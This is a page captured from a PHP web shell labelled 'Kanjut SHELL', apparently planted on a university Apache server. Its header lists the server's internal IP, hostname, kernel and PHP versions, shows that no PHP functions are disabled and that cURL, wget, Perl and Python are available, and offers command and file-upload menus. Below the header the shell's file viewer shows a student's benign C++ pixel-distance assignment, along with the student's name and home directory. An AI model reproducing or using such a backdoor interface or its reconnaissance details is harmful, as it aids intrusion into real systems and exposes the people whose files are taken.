Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.220.200.197
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/sknewsome/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/sknewsome/assignment7.cpp
// CS212 Assignment 7
// Due: Monday, April 18
//
// File Name: assignment7.cpp
// Author: Symonne Newsome
// Instructor Dr. Wang
//
// Compile: g++ assignment7.cpp
// Run: ./a.out < in7.txt
//
// Goal: the program  will read a set of pixels and output coordinates and 
//	length for only the pixel that is ON
//


#include <iostream>
#include <iomanip>
using namespace std;

#include "point.h"
#include "pixel.h"


int main()
{
	Pixel px1, px2;
	int a, b;
	string str;	
	StatusType sta;
	
	cout << fixed << showpoint << setprecision(1);

	cin >> a >> b >> str;

	while(cin)
	{
		if(str == "ON")
 		{
			sta = ON;
			px2.Set(a, b, sta);
			cout << "The coordinates of px2 are: ";
			px2.Print();
			cout << "\n The distance is: " << px2.Distance(px1) << "\n\n";
		}

		else if(str == "OFF")
		{
			sta = OFF;
		}	

		cin >> a >> b >> str;
	}

	return 0;
}


Stv3n404 - 2023